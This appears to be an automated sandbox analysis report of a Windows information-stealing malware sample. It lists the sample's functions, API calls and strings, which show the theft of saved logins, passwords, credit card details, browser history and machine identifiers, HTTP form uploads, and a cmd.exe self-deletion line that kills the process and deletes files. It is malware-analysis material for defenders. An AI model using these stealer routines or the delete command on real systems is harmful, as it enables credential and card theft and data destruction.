Opcode ID: 2f13f92b3c6a5be3646bf7ac467031b1ee4e832a2dbb5629f53ef20952f3fc58
Instruction ID: 7c8ba2ebac5abec2cffa1197249ddf1b3fbd50a944c5010f4aa48d41b8371064
Opcode Fuzzy Hash: 2f13f92b3c6a5be3646bf7ac467031b1ee4e832a2dbb5629f53ef20952f3fc58
Instruction Fuzzy Hash: D5C19FB1548341AFD720DF51DC81FEBB7E8EBC9704F00492EF18992141E778A9488B6B

Uniqueness

Uniqueness Score: -1.00%

Function 0041AC00, Relevance: 47.6, APIs: 21, Strings: 6, Instructions: 311filestringCOMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?,2D794ED1), ref: 0041AC69
lstrcatA.KERNEL32(?,\temp), ref: 0041AC79
CopyFileA.KERNEL32(?,?,00000001), ref: 0041AC87
DeleteFileA.KERNEL32(?), ref: 0041AFC7

Part of subcall function 0049E19E: __fsopen.LIBCMT ref: 0049E1AB

Part of subcall function 0041AA40: _memset.LIBCMT ref: 0041AAE1
Part of subcall function 0041AA40: LocalAlloc.KERNEL32 ref: 0041AB22

_fprintf.LIBCMT ref: 0041ADD7
_fprintf.LIBCMT ref: 0041ADE7
_fprintf.LIBCMT ref: 0041ADF2
_fprintf.LIBCMT ref: 0041ADFE
_fprintf.LIBCMT ref: 0041AE09
_fprintf.LIBCMT ref: 0041AE15
_fprintf.LIBCMT ref: 0041AE20
_fprintf.LIBCMT ref: 0041AE6E
_fprintf.LIBCMT ref: 0041AE98
_fprintf.LIBCMT ref: 0041AEA8

Part of subcall function 0049CF02: __lock_file.LIBCMT ref: 0049CF49
Part of subcall function 0049CF02: __stbuf.LIBCMT ref: 0049CFCD
Part of subcall function 0049CF02: __output_l.LIBCMT ref: 0049CFDD
Part of subcall function 0049CF02: __ftbuf.LIBCMT ref: 0049CFE7

_fprintf.LIBCMT ref: 0041AEB3
_fprintf.LIBCMT ref: 0041AEBF
_fprintf.LIBCMT ref: 0041AECA
_fprintf.LIBCMT ref: 0041AED6
_fprintf.LIBCMT ref: 0041AEE1
_fprintf.LIBCMT ref: 0041AF2F
_fprintf.LIBCMT ref: 0041AF65

Strings

\temp, xrefs: 0041AC6F
xE~, xrefs: 0041AC8D
Login: %s, xrefs: 0041AE0F, 0041AED0
Password: %s, xrefs: 0041AE68, 0041AF29
Soft: %s, xrefs: 0041ADE1, 0041AEA2
Host: %s, xrefs: 0041ADF8, 0041AEB9

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _fprintf$File$AllocCopyCurrentDeleteDirectoryLocal__fsopen__ftbuf__lock_file__output_l__stbuf_memsetlstrcat
String ID: Host: %s$Login: %s$Password: %s$Soft: %s$\temp$xE~
API String ID: 3148340754-3628020801
Opcode ID: 76136ff908482d74d46b376a15d208096b2e414004d91fdcc01663f17b6b9ee6
Instruction ID: 5855f305d5317dea618cad4f431a335e56faaf9016d61075604566fdf80b3934
Opcode Fuzzy Hash: 76136ff908482d74d46b376a15d208096b2e414004d91fdcc01663f17b6b9ee6
Instruction Fuzzy Hash: 40A124B15043006BCA10EB219C82FEB7BA99F95708F04492EF54597282EB7ED91587BF

Uniqueness

Uniqueness Score: -1.00%

Function 0041B340, Relevance: 36.9, APIs: 14, Strings: 7, Instructions: 177filestringCOMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0041B38D
lstrcatA.KERNEL32(?,\temp), ref: 0041B39D
CopyFileA.KERNEL32(?,?,00000001), ref: 0041B3AB
_memset.LIBCMT ref: 0041B3C0
_sprintf.LIBCMT ref: 0041B3D4
DeleteFileA.KERNEL32(?), ref: 0041B56F

Part of subcall function 0049E19E: __fsopen.LIBCMT ref: 0049E1AB

_fprintf.LIBCMT ref: 0041B481
_fprintf.LIBCMT ref: 0041B48C

Part of subcall function 0049CF02: __lock_file.LIBCMT ref: 0049CF49
Part of subcall function 0049CF02: __stbuf.LIBCMT ref: 0049CFCD
Part of subcall function 0049CF02: __output_l.LIBCMT ref: 0049CFDD
Part of subcall function 0049CF02: __ftbuf.LIBCMT ref: 0049CFE7

_fprintf.LIBCMT ref: 0041B498
_fprintf.LIBCMT ref: 0041B4A3
_fprintf.LIBCMT ref: 0041B4B2
_fprintf.LIBCMT ref: 0041B4BD

Part of subcall function 0041AA40: _memset.LIBCMT ref: 0041AAE1
Part of subcall function 0041AA40: LocalAlloc.KERNEL32 ref: 0041AB22

_fprintf.LIBCMT ref: 0041B50D
_fprintf.LIBCMT ref: 0041B52F

Strings

\temp, xrefs: 0041B393
Year: %s, xrefs: 0041B4AC
CC\%s_%s.txt, xrefs: 0041B3CE
Month: %s, xrefs: 0041B492
0~, xrefs: 0041B3D9
Name: %s, xrefs: 0041B479
Card: %s, xrefs: 0041B500

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _fprintf$File_memset$AllocCopyCurrentDeleteDirectoryLocal__fsopen__ftbuf__lock_file__output_l__stbuf_sprintflstrcat
String ID: CC\%s_%s.txt$Card: %s$Month: %s$Name: %s$Year: %s$\temp$0~
API String ID: 3161493688-2076413979
Opcode ID: d517276bc68615f6bf99cf611a4335747043aa7c5189291e00b97d350334d35b
Instruction ID: 8acee580f3db2ed3fda81b8ff0943596ad47883d145fdde1cecd6ee5fea8284c
Opcode Fuzzy Hash: d517276bc68615f6bf99cf611a4335747043aa7c5189291e00b97d350334d35b
Instruction Fuzzy Hash: AF51A9B150430067C610FB65DCC6FAF77ADABD8708F44492EF54957282EA7CE90487AA

Uniqueness

Uniqueness Score: -1.00%

Function 0041B000, Relevance: 35.3, APIs: 16, Strings: 4, Instructions: 265stringfileCOMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0041B050
lstrcatA.KERNEL32(?,\temp), ref: 0041B069
CopyFileA.KERNEL32(?,?,00000001), ref: 0041B076
_memset.LIBCMT ref: 0041B088
lstrcatA.KERNEL32(?,007EC618), ref: 0041B09B
lstrcatA.KERNEL32(?,004BB7F4), ref: 0041B0A7
lstrcatA.KERNEL32(?,?), ref: 0041B0AF
lstrcatA.KERNEL32(?,004BDFA4), ref: 0041B0BB
lstrcatA.KERNEL32(?,?), ref: 0041B0C3
lstrcatA.KERNEL32(?,.txt), ref: 0041B0CF
DeleteFileA.KERNEL32(?), ref: 0041B315

Part of subcall function 0049E19E: __fsopen.LIBCMT ref: 0049E1AB

lstrcatA.KERNEL32(00000000,007EC5B8), ref: 0041B1F0
lstrcatA.KERNEL32(00000000,007EC5B8), ref: 0041B23F
lstrcatA.KERNEL32(00000000,004BDCAC), ref: 0041B252
_fprintf.LIBCMT ref: 0041B2B0
_fprintf.LIBCMT ref: 0041B2D2

Strings

.txt, xrefs: 0041B0C5
\temp, xrefs: 0041B05C
%s%s%s%s%s%s%s, xrefs: 0041B2AA
0Av, xrefs: 0041B0D1

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrcat$File_fprintf$CopyCurrentDeleteDirectory__fsopen_memset
String ID: %s%s%s%s%s%s%s$.txt$0Av$\temp
API String ID: 1987428508-3127078769
Opcode ID: fbf4f0269170031bf65bd40e542091ae8665d03053efbc81da1958aa4f0ceabd
Instruction ID: 45dc01be6d409268b7113cb2dd3585880187eba984a97163c16e246cd204de9e
Opcode Fuzzy Hash: fbf4f0269170031bf65bd40e542091ae8665d03053efbc81da1958aa4f0ceabd
Instruction Fuzzy Hash: FA91E2B1504340ABC320EFA5DC86FABB7A9EFC9704F04095EF58587241E779D948C7AA

Uniqueness

Uniqueness Score: -1.00%

Function 004155C0, Relevance: 31.8, APIs: 5, Strings: 13, Instructions: 304fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,2D794ED1,00000008,00000000,00000000), ref: 00415615
GetFileSize.KERNEL32(00000000,00000000), ref: 0041562A
CloseHandle.KERNEL32(?), ref: 0041563E

Strings

gif, xrefs: 00415742
png, xrefs: 00415764
image/jpeg, xrefs: 00415730
image/gif, xrefs: 00415758
jpg, xrefs: 0041570E
"; filename=", xrefs: 0041580B
., xrefs: 004156EB
image/tiff, xrefs: 00415793
tiff, xrefs: 00415781
", xrefs: 00415847
image/png, xrefs: 00415776
Content-Disposition: form-data; name=", xrefs: 004157E2
Content-Type: , xrefs: 00415855

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID: "$"; filename="$.$Content-Disposition: form-data; name="$Content-Type: $gif$image/gif$image/jpeg$image/png$image/tiff$jpg$png$tiff
API String ID: 1378416451-4065671631
Opcode ID: ea6a2fb1ee6d6ef402fcf5817fd9f612878bf6c94882d1955451a041e7158876
Instruction ID: 80719e25e603cec28454501bae3b388551409cd9e96ecae93b1df241d7c6c649
Opcode Fuzzy Hash: ea6a2fb1ee6d6ef402fcf5817fd9f612878bf6c94882d1955451a041e7158876
Instruction Fuzzy Hash: B8A103B1208340EFD714EB21D952FEFB7E9ABC8704F104A1EF08697281DA78E944C75A

Uniqueness

Uniqueness Score: -1.00%

Function 00412B50, Relevance: 27.0, APIs: 18, Instructions: 43sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(0000006F), ref: 00412B59
Sleep.KERNEL32(0000022B), ref: 00412B60
Sleep.KERNEL32(0000014D), ref: 00412B67
Sleep.KERNEL32(0000006F), ref: 00412B6B
Sleep.KERNEL32(0000022B), ref: 00412B72
Sleep.KERNEL32(0000014D), ref: 00412B79

Part of subcall function 004049B0: ExitProcess.KERNEL32 ref: 00404A45

@SetViceVariants@12.T6ZZFFRLQS ref: 00412B80
Sleep.KERNEL32(0000022B), ref: 00412B8E
ExitProcess.KERNEL32 ref: 00412B92
Sleep.KERNEL32(0000006F), ref: 00412BA2
Sleep.KERNEL32(0000022B), ref: 00412BA9
Sleep.KERNEL32(0000014D), ref: 00412BB0
Sleep.KERNEL32(0000006F), ref: 00412BB4
Sleep.KERNEL32(0000022B), ref: 00412BBB
Sleep.KERNEL32(0000014D), ref: 00412BC2
Sleep.KERNEL32(0000006F), ref: 00412BC6
Sleep.KERNEL32(0000022B), ref: 00412BCD
Sleep.KERNEL32(0000014D), ref: 00412BD4

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Sleep$ExitProcess$Variants@12Vice
String ID:
API String ID: 3674933605-0
Opcode ID: 142cabb08dc052c3c54d8bb39ea5c523f16a276e84948a7b44703a42e1d2ac0c
Instruction ID: 2b910b3d3d281ebef1baebcb64f510246aba55f29850fa8bf38cf24686bed96f
Opcode Fuzzy Hash: 142cabb08dc052c3c54d8bb39ea5c523f16a276e84948a7b44703a42e1d2ac0c
Instruction Fuzzy Hash: 68F04830E8426971E56277F22C1FB9F1E05AF41BE1F050027721C590E24ED54451CAE6

Uniqueness

Uniqueness Score: -1.00%

Function 004926D0, Relevance: 23.3, APIs: 6, Strings: 7, Instructions: 569processCOMMON

Download Yara Rule

APIs

Part of subcall function 00417A90: std::locale::_Init.LIBCPMT ref: 00417AD6
Part of subcall function 00417A90: std::_Lockit::_Lockit.LIBCPMT ref: 00417AE9

Part of subcall function 00418B00: std::_Lockit::_Lockit.LIBCPMT ref: 00418B59

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004928B5
Process32First.KERNEL32(00000000,00000128), ref: 004928C8
Process32Next.KERNEL32 ref: 004928EE

Part of subcall function 00417940: __CxxThrowException@8.LIBCMT ref: 00417963
Part of subcall function 00417940: std::exception::exception.LIBCMT ref: 0041798C
Part of subcall function 00417940: __CxxThrowException@8.LIBCMT ref: 004179AB
Part of subcall function 00417940: std::exception::exception.LIBCMT ref: 004179CD
Part of subcall function 00417940: __CxxThrowException@8.LIBCMT ref: 004179EC
Part of subcall function 00417940: std::exception::exception.LIBCMT ref: 00417A09
Part of subcall function 00417940: __CxxThrowException@8.LIBCMT ref: 00417A28

Strings

---------- , xrefs: 00492959, 00492A9F
0pL, xrefs: 004927C1
`J@, xrefs: 004927F8, 00492D90, 00492DB2
A@, xrefs: 004927DE, 00492ECD
@A@, xrefs: 004927CA, 00492EE1
@B@, xrefs: 00492826, 00492DD7
----------, xrefs: 00492867

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Exception@8Throw$std::exception::exception$LockitLockit::_Process32std::_$CreateFirstInitNextSnapshotToolhelp32std::locale::_
String ID: ----------$---------- $0pL$@A@$@B@$`J@$A@
API String ID: 1947876736-662054990
Opcode ID: bc174fdda8882830cc61b04c1a4d856725d22a7d9ca8c9866f43daf0d3f5a8b3
Instruction ID: 2bfb976691c48a61b7a39d47cec03666e9eca9abd99376726084787559db1fd8
Opcode Fuzzy Hash: bc174fdda8882830cc61b04c1a4d856725d22a7d9ca8c9866f43daf0d3f5a8b3
Instruction Fuzzy Hash: 9B329CB1D00258AFDF20DF94CD85BDEBBB4AF45308F1481AEE40967242DBB95A84CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00415310, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 203networkCOMMON

Download Yara Rule

APIs

__cftof.LIBCMT ref: 004153E5
InternetOpenA.WININET(?,00000000,?,00000000,00000000), ref: 00415403
InternetSetOptionA.WININET ref: 00415425
InternetConnectA.WININET(00000000,?,00000050,?,?,00000003,00000000,00000001), ref: 0041544F
HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00400000,00000001), ref: 0041547D
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0041549A
InternetCloseHandle.WININET(00000000), ref: 004154B1

Part of subcall function 00414FD0: InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 00415041
Part of subcall function 00414FD0: InternetReadFile.WININET(?,?,000003E8,?), ref: 00415062
Part of subcall function 00414FD0: _memmove.LIBCMT ref: 0041509D
Part of subcall function 00414FD0: _memset.LIBCMT ref: 004150D7
Part of subcall function 00414FD0: HttpQueryInfoA.WININET(?,0000001D,?,?,00000000), ref: 004150ED

InternetCloseHandle.WININET(00000000), ref: 004154B8
InternetCloseHandle.WININET(00000000), ref: 004154C4

Part of subcall function 00414E80: HttpAddRequestHeadersA.WININET(?,2D794ED1,?,20000000), ref: 00414F00
Part of subcall function 00414E80: HttpAddRequestHeadersA.WININET(?,2D794ED1,?,20000000), ref: 00414F30
Part of subcall function 00414E80: HttpAddRequestHeadersA.WININET(?,2D794ED1,?,20000000), ref: 00414F60
Part of subcall function 00414E80: HttpAddRequestHeadersA.WININET(?,2D794ED1,?,20000000), ref: 00414F90

Strings

http://, xrefs: 00415377
/, xrefs: 004153A6
GET, xrefs: 00415477

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Internet$Http$Request$Headers$CloseHandle$FileOpen$ConnectInfoOptionPointerQueryReadSend__cftof_memmove_memset
String ID: /$GET$http://
API String ID: 3181371185-2325301807
Opcode ID: 9591bf102f1c311b7fa202cbda15159c952b12215bbb018c79a422fc8d5bdcef
Instruction ID: 8db07d805f68f9f5de63f8cd420c743e13d842eb26b56de422f3cb701a38c734
Opcode Fuzzy Hash: 9591bf102f1c311b7fa202cbda15159c952b12215bbb018c79a422fc8d5bdcef
Instruction Fuzzy Hash: 556193B1608740EFD710DB64DC85FABB7E9FBC9704F40092EF58596281DBB8E9448B1A

Uniqueness

Uniqueness Score: -1.00%

Function 00416540, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 106filestringCOMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00416576
lstrcatA.KERNEL32(?,\temp), ref: 00416586
CopyFileA.KERNEL32(?,?,00000001), ref: 00416594
_memset.LIBCMT ref: 004165A9
_sprintf.LIBCMT ref: 004165BD
DeleteFileA.KERNEL32(?), ref: 00416682

Part of subcall function 0049E19E: __fsopen.LIBCMT ref: 0049E1AB

_fprintf.LIBCMT ref: 00416646

Strings

\temp, xrefs: 0041657C
History\%s_%s.txt, xrefs: 004165B7
%s, xrefs: 00416640
SELECT url FROM urls, xrefs: 004165E8

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$CopyCurrentDeleteDirectory__fsopen_fprintf_memset_sprintflstrcat
String ID: %s$History\%s_%s.txt$SELECT url FROM urls$\temp
API String ID: 440339207-2199967400
Opcode ID: 4d2ac0971bee7f0850d0ea8f0a85b41c2c86924b31da9a2c7fb5a7cebf4e5fe6
Instruction ID: f301f8b0ca5b5b5d7556d172ffd4b00453248fe07f68120fbaffefe979a3aa37
Opcode Fuzzy Hash: 4d2ac0971bee7f0850d0ea8f0a85b41c2c86924b31da9a2c7fb5a7cebf4e5fe6
Instruction Fuzzy Hash: FF31ABB25443006BC624EB61EC86FEF73ACAF98704F054D2EF64597141EB78E944C7AA

Uniqueness

Uniqueness Score: -1.00%

Function 004166A0, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 110filestringCOMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 004166D6
lstrcatA.KERNEL32(?,\temp), ref: 004166E6
CopyFileA.KERNEL32(?,?,00000001), ref: 004166F4
_memset.LIBCMT ref: 00416709
_sprintf.LIBCMT ref: 0041671D
DeleteFileA.KERNEL32(?), ref: 004167EE

Part of subcall function 0049E19E: __fsopen.LIBCMT ref: 0049E1AB

_fprintf.LIBCMT ref: 004167B2

Strings

\temp, xrefs: 004166DC
%s%s, xrefs: 004167AC
Downloads\%s_%s.txt, xrefs: 00416717

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$CopyCurrentDeleteDirectory__fsopen_fprintf_memset_sprintflstrcat
String ID: %s%s$Downloads\%s_%s.txt$\temp
API String ID: 440339207-2902098628
Opcode ID: 2fc63afe463d02fddce2d21194c23989f69d703fac48a41c92495deb8d0b853a
Instruction ID: 80df4bba3acfbd8c08416efe2c0a09753a5635a6c00385e30a2963ceea5362ea
Opcode Fuzzy Hash: 2fc63afe463d02fddce2d21194c23989f69d703fac48a41c92495deb8d0b853a
Instruction Fuzzy Hash: EA31EBB25043006BC620EB61DC86FEF73ECABD8714F014D2EF65993141EA78E949C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 00498570, Relevance: 16.7, APIs: 11, Instructions: 198fileCOMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(?,?,?,?), ref: 004985A6
GetFileSize.KERNEL32(?,00000000,00000000), ref: 0049862C
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?), ref: 0049864D
ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 00498664
SetFilePointer.KERNEL32(?,00000024,00000000,00000000), ref: 0049866D
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0049867E
SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 0049869F
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 004986B0

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$PointerRead$HandleInformationSize
String ID:
API String ID: 2979504256-0
Opcode ID: bfbb248982ee7a52a62e57597ec3854ac9af00e181a86566ae72ff5cad27a90f
Instruction ID: 227adef929ca9e4cc889ebfd138ef45e677136110288c94b542a9d3f050b2155
Opcode Fuzzy Hash: bfbb248982ee7a52a62e57597ec3854ac9af00e181a86566ae72ff5cad27a90f
Instruction Fuzzy Hash: 19616E71604300AFE714DF59CC81B6BBBE4FB89704F14892EF65597280DB78E9048B9A

Uniqueness

Uniqueness Score: -1.00%

Function 004918F0, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 122libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 00491960
GetProcAddress.KERNEL32(00000000), ref: 00491967
_memset.LIBCMT ref: 0049197B
GlobalMemoryStatusEx.KERNEL32 ref: 00491990

Part of subcall function 00496100: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0049629C

GlobalMemoryStatus.KERNEL32 ref: 00491A0C

Strings

GlobalMemoryStatusEx, xrefs: 00491947
, xrefs: 00491A04
MB, xrefs: 004919B5, 00491A28
kernel32.dll, xrefs: 0049194C

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: GlobalMemoryStatus$AddressHandleIos_base_dtorModuleProc_memsetstd::ios_base::_
String ID: $ MB$GlobalMemoryStatusEx$kernel32.dll
API String ID: 1880670307-2360964551
Opcode ID: f0677af00084243c6d0ec27921ceae4ce153ebe7ab0b127a877720fdedfe43fd
Instruction ID: 3bb85a2df4540dd178470525d205b64bac93281e9d201e02d99d2e0099ba6c38
Opcode Fuzzy Hash: f0677af00084243c6d0ec27921ceae4ce153ebe7ab0b127a877720fdedfe43fd
Instruction Fuzzy Hash: A3418FB15083409FD760DF69C841B4BBBE8BBD8708F40492EF19993251EB789508CFAB

Uniqueness

Uniqueness Score: -1.00%

Function 00405100, Relevance: 15.2, APIs: 10, Instructions: 195stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00414A10: _memset.LIBCMT ref: 00414A1B
Part of subcall function 00414A10: _strcpy_s.LIBCMT ref: 00414A32
Part of subcall function 00414A10: _memset.LIBCMT ref: 00414A51

_memset.LIBCMT ref: 00405170
_memset.LIBCMT ref: 00405183
_strtok.LIBCMT ref: 004051B3
lstrcatA.KERNEL32(?,007E2F18,?,?,00000000,2D794ED1), ref: 004051DF
lstrcatA.KERNEL32(?,00000000,?,?,00000000,2D794ED1), ref: 00405202
lstrcatA.KERNEL32(?,007627B0), ref: 00405227
lstrcatA.KERNEL32(?,?,?,00000000), ref: 0040525C
lstrcatA.KERNEL32(?,007630B8), ref: 0040526C
ShellExecuteA.SHELL32(00000000,00000000,?,004BB6C4,00000000,00000000), ref: 0040533D
_strtok.LIBCMT ref: 00405352

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrcat$_memset$_strtok$ExecuteShell_strcpy_s
String ID:
API String ID: 1415731133-0
Opcode ID: f9c2aa327a9252ee08233d91339566c0136ba04a51cef3ae75b43697f585151a
Instruction ID: c786249e37913b12d59a80b914a847e06419e2e2d3a03ff72aac9bf4afb915a0
Opcode Fuzzy Hash: f9c2aa327a9252ee08233d91339566c0136ba04a51cef3ae75b43697f585151a
Instruction Fuzzy Hash: 3471A2B11083809FD725EF55C880AABBBECEF95744F40092EF18547151DB789A48CB67

Uniqueness

Uniqueness Score: -1.00%

Function 00414FD0, Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 263networkfileCOMMON

Download Yara Rule

APIs

InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 00415041
InternetReadFile.WININET(?,?,000003E8,?), ref: 00415062
_memmove.LIBCMT ref: 0041509D
_memset.LIBCMT ref: 004150D7
HttpQueryInfoA.WININET(?,0000001D,?,?,00000000), ref: 004150ED

Strings

text, xrefs: 00415196

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileInternet$HttpInfoPointerQueryRead_memmove_memset
String ID: text
API String ID: 612126011-999008199
Opcode ID: 2d322ae4027e1f2975448ada20b4d3f589148d7364d1be039501097e14c62647
Instruction ID: 010eb944c99dd7c4094758586f6ceeef2a8d535b3fc3a7f0f8942080d6cfdaab
Opcode Fuzzy Hash: 2d322ae4027e1f2975448ada20b4d3f589148d7364d1be039501097e14c62647
Instruction Fuzzy Hash: C2A16A715047409FD324DF69C984AABBBE8FFC9704F404A2EF48A87650E738E944CB66

Uniqueness

Uniqueness Score: -1.00%

Function 00495C70, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 147COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(2D794ED1,0000000F,00000000,00000000), ref: 00495CB3

Part of subcall function 004950D0: OpenProcess.KERNEL32 ref: 00495104
Part of subcall function 004950D0: GetModuleFileNameExA.PSAPI(00000000,00000000,00000000,00000104), ref: 0049511D
Part of subcall function 004950D0: CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000104), ref: 00495123

GetCurrentProcessId.KERNEL32(?,00000000), ref: 00495CD0

Part of subcall function 00495B50: _memset.LIBCMT ref: 00495BC6
Part of subcall function 00495B50: OpenProcess.KERNEL32(00000410,00000000,?,747DF510,?,00000000,00000000,004B76C0,000000FF), ref: 00495BD5
Part of subcall function 00495B50: EnumProcessModules.PSAPI(00000000,?,00000004,?), ref: 00495BEC
Part of subcall function 00495B50: GetModuleBaseNameA.PSAPI(00000000,?,00000000,00000104,00000000,?,00000004,?), ref: 00495C03
Part of subcall function 00495B50: CloseHandle.KERNEL32(00000000), ref: 00495C09

ShellExecuteA.SHELL32(00000000,00000000,C:\Windows\System32\cmd.exe,?,00000000,00000000), ref: 00495E4A

Strings

" & del C:\ProgramData\*.dll, xrefs: 00495D26
& exit, xrefs: 00495D3E
C:\Windows\System32\cmd.exe, xrefs: 00495E43
/c taskkill /im , xrefs: 00495CE4
/f & timeout /t 6 & del /f /q ", xrefs: 00495CF7

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Process$CloseCurrentHandleModuleNameOpen$BaseEnumExecuteFileModulesShell_memset
String ID: & exit$ /f & timeout /t 6 & del /f /q "$" & del C:\ProgramData\*.dll$/c taskkill /im $C:\Windows\System32\cmd.exe
API String ID: 1900182271-455057220
Opcode ID: 325f77602431cf2ddcd7e2c0eb3cd6cb5bd32c029cc92001d957d666858a7bcd
Instruction ID: 80fb70d65dd2718c4243bffa5d69c3b98486de3ce39fce78e17722933c0bd343
Opcode Fuzzy Hash: 325f77602431cf2ddcd7e2c0eb3cd6cb5bd32c029cc92001d957d666858a7bcd
Instruction Fuzzy Hash: 27519EB1508780DFDB21DB65C881B9FFBE9AB95710F504A2FF18983241DB389504CBAB

Uniqueness

Uniqueness Score: -1.00%

Function 00415049, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 227networkfileCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,000003E8,?), ref: 00415062
_memmove.LIBCMT ref: 0041509D
_memset.LIBCMT ref: 004150D7
HttpQueryInfoA.WININET(?,0000001D,?,?,00000000), ref: 004150ED
_memcpy_s.LIBCMT ref: 00415278
_memcpy_s.LIBCMT ref: 0041529E

Strings

text, xrefs: 00415196

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memcpy_s$FileHttpInfoInternetQueryRead_memmove_memset
String ID: text
API String ID: 2621122860-999008199
Opcode ID: 15825d233ae8deb5032c66d44d7b6adc989b7bbf2d4623211544adc518518acf
Instruction ID: 091cd4be6dad48abed75e81d522ed1e64d98246c836f371e83b4be71397394fe
Opcode Fuzzy Hash: 15825d233ae8deb5032c66d44d7b6adc989b7bbf2d4623211544adc518518acf
Instruction Fuzzy Hash: 94817C716047009FD714DF69C980AABB7E8FFC8704F404A2EF48A87651EB38E944CB56

Uniqueness

Uniqueness Score: -1.00%

Function 00491120, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 65registryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0049115D
RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,00000000), ref: 0049117B
RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,?), ref: 0049119D
RegCloseKey.ADVAPI32(?), ref: 004911A8
CharToOemA.USER32(?,?), ref: 004911BB

Strings

SOFTWARE\Microsoft\Cryptography, xrefs: 00491171
MachineGuid, xrefs: 00491197

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CharCloseOpenQueryValue_memset
String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
API String ID: 2235053359-1211650757
Opcode ID: 0d140eaf0a69e7697621d4ede093fec4d8c5d02b3b65d31d4745cf367963877d
Instruction ID: 19c2117ca53fd4f36b8f6bf9f1fbbeae893722a24cb0c5e242639b8217a5a643
Opcode Fuzzy Hash: 0d140eaf0a69e7697621d4ede093fec4d8c5d02b3b65d31d4745cf367963877d
Instruction Fuzzy Hash: 2921D775208346ABD720DF10DC49FABBBE8EFD8704F10892EF58987191D7B49108CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00490D90, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 65registryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00490DCD
RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020119,?,00000000), ref: 00490DEB
